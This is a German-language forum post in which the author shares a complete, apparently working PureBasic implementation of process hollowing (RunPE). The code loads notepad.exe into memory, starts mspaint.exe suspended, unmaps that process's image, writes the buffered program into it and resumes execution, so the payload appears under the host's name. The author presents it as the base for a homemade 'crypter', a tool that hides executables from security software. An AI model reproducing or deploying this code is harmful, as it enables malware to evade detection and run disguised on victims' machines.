Also ich sitz nun seit tagen daran diesen code zu übersetzen und es sieht so aus als hätte ich es nun geschafft :P funktioniert zumindest bei mir problemlos! Jetzt steht dem eigenen exe packer oder crypter nichtsmehr im weg!
Dieser code hier liest Notepad ganz normal in einen buffer ein und startet ihn dan, allerdings wird er im task manager als mspaint.exe angezeigt da man dafür einen host process benötigt.
Code: Alles auswählen
Prototype.l ZwUnmapViewOfSectionPT(Processhandle.l,BaseAdress.l)
ntdll = GetModuleHandle_("ntdll.dll")
Global ZwUnmapViewOfSection_.ZwUnmapViewOfSectionPT = GetProcAddress_(ntdll,"ZwUnmapViewOfSection")
Structure IMAGE_SECTION_HEADER
Name.b[8]
StructureUnion
PhysicalAddress.l
VirtualSize.l
EndStructureUnion
VirtualAddress.l
SizeOfRawData.l
PointerToRawData.l
PointerToRelocations.l
PointerToLinenumbers.l
NumberOfRelocations.w
NumberOfLinenumbers.w
Characteristics.l
EndStructure
Procedure injectfile(lpProcessname.s, lpBuffer.l)
;Declare
Structure IMAGE_SECTION_HEADERS
a.IMAGE_SECTION_HEADER[95]
EndStructure
Result.l = 0
Startupinfo.STARTUPINFO
ProcessInfo.PROCESS_INFORMATION
Context.CONTEXT
BaseAddress.l
lpNumberOfBytesRead.l
lpNumberOfBytesWritten.w
*NtHeaders.IMAGE_NT_HEADERS
*Sections.IMAGE_SECTION_HEADERS
i.l
;---
Result = #False
ZeroMemory_(@StartupInfo, SizeOf(STARTUPINFO));
StartupInfo\cb = SizeOf(STARTUPINFO)
StartupInfo\dwFlags = #STARTF_USESHOWWINDOW
StartupInfo\wShowWindow = #SW_SHOW
If CreateProcess_(#NUL,lpProcessname,#NUL,#NUL,#False,#CREATE_SUSPENDED,#NUL,#NUL,StartupInfo,@ProcessInfo)
Context\ContextFlags = #CONTEXT_INTEGER
GetThreadContext_(ProcessInfo\hThread, Context);
ReadProcessMemory_(ProcessInfo\hProcess,Context\Ebx+8,@BaseAddress,SizeOf(BaseAddress),@lpNumberOfBytesRead)
If ZwUnmapViewOfSection_(ProcessInfo\hProcess,BaseAddress) >= 0
*adr.IMAGE_DOS_HEADER = lpBuffer
*NtHeaders = lpBuffer + *adr\e_lfanew
BaseAddress = VirtualAllocEx_(ProcessInfo\hProcess,*NtHeaders\OptionalHeader\ImageBase,*NtHeaders\OptionalHeader\SizeOfImage,#MEM_RESERVE | #MEM_COMMIT, #PAGE_READWRITE)
WriteProcessMemory_(ProcessInfo\hProcess,BaseAddress,lpBuffer,*NtHeaders\OptionalHeader\SizeOfHeaders,@lpNumberOfBytesWritten)
*Sections = @*NtHeaders\OptionalHeader + *NtHeaders\FileHeader\SizeOfOptionalHeader
For i = 0 To *NtHeaders\FileHeader\NumberOfSections-1
WriteProcessMemory_(ProcessInfo\hProcess,BaseAddress+*Sections\a[i]\VirtualAddress,lpBuffer+*Sections\a[i]\PointerToRawData,*Sections\a[i]\SizeOfRawData,@lpNumberOfBytesWritten)
Next
WriteProcessMemory_(ProcessInfo\hProcess,Context\Ebx+8,@BaseAddress,SizeOf(BaseAddress),@lpNumberOfBytesWritten)
Context\Eax = BaseAddress + *NtHeaders\OptionalHeader\AddressOfEntryPoint
Result = SetThreadContext_(ProcessInfo\hThread, Context)
If Result
ResumeThread_(ProcessInfo\hThread)
Else
TerminateProcess_(ProcessInfo\hProcess, 0);
CloseHandle_(ProcessInfo\hProcess)
CloseHandle_(ProcessInfo\hThread)
EndIf
EndIf
EndIf
EndProcedure
If ReadFile(0,"C:\Windows\System32\notepad.exe")
buffer = AllocateMemory(Lof(0)) ; Datei ganz normal in einen buffer lesen
ReadData(0,buffer,Lof(0))
CloseFile(0)
EndIf
injectfile("C:\Windows\System32\mspaint.exe",buffer) ; nun führen wir den buffer im addressraum von paint aus!
Grüße, MySelf